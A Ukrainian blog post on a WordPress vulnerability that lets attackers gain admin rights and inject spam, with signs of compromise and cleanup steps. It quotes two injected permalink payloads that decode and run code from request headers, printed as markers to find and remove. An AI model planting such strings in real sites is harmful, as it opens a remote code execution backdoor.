Думаю, що переважна більшість власників блогів на движку WordPress вже чули про критичну вразливість, від якої постраждали вже десятки тисяч блогів в світі. Серед них чимало відомих.
Сьогодні мав кілька розмов, під час яких виявилось, що переважна більшість українських власників блогів на WordPress, які вчасно не проапгрейдились до останньої версії – мають проблему з зараженим сайтом.
Як відбувається зараження? Спершу відбувається реєстрація нового користувача. Потім через діру в безпеці движка цей користувач отримує права адміністратора та контроль над сайтом. Далі починає тихенько додавати спам та свої посилання на зовнішній контент в архівних записах блогу.
Про проблему можуть не переживати лише ті, в кого остання версія движка – WordPress 2.84. Там діра залатана.
Хоча про проблему стало відомо ще 5 вересня, більшість власників блогів досі нічого не зробили задля уникнення проблем.
Існує кілька ознак, які свідчать про взлом блогу. Перша – це збільшення кількості адміністраторів блогу. Причому зловмисники використовують JavaScript, щоб приховати нового адміністратора. Якщо сайт заражений, то ви побачите лише збільшення кількості адміністраторів, але не побачите їх в переліку адмінів.
Друга ознака – зміна в структурі постійних посилань (permalinks). Там може з’явитись ось такий код:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
або такий:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Що робити? Перше – якщо жодних ознак взлому нема – терміново проапгрейдитись до найсвіжішої версії WordPress.
Якщо ознаки взлому є, то:
1. Зайти в адмінпалень в розділ Setting, далі – Permalinks і знищити лишній код (зазначений вище).
2. З‘ясувати порядковий номер останнього зареєстрованого на блозі користувача. Найпростіший варіант – це додати загальну кількість всіх користувачів по розділах (наприклад, читачі, автори, адміни). Далі зайти в редагування даних будь-якого з користувачів і в командній стрічці, де прописується “ID=”, вставляємо отриману вами цифру, але збільшуємо на одиницю. По ідеї ви маєте потрапити на вашого нового адміна. Якщо цього не відбулось, а там якийсь інший користувач, збільшість ID ще не одиницю, і так продовжуйте, поки не дійдете до нього.
3. В профайлі цього користувача (в полі ІМ’Я) ви побачите дивний код (javascript) та права адміна. Необхідно видалити спершу код, далі понизити його в правах до простого користувача.
4. Перейдіть до переліку користувачів. Тепер ви можете спокійно побачити вашого шкідника серед інших користувачів. Знайшли? Видаляйте.
Лише після цього можна встановлювати новий WordPress 2.84. Щодо вашої бази даних. Якщо в ній вже встигли покопатись, і деякі постійні посилання були замінені – доведеться вручну правити базу даних. Або сподіватись на якусь утиліту, яку викладуть на wordpress.org.
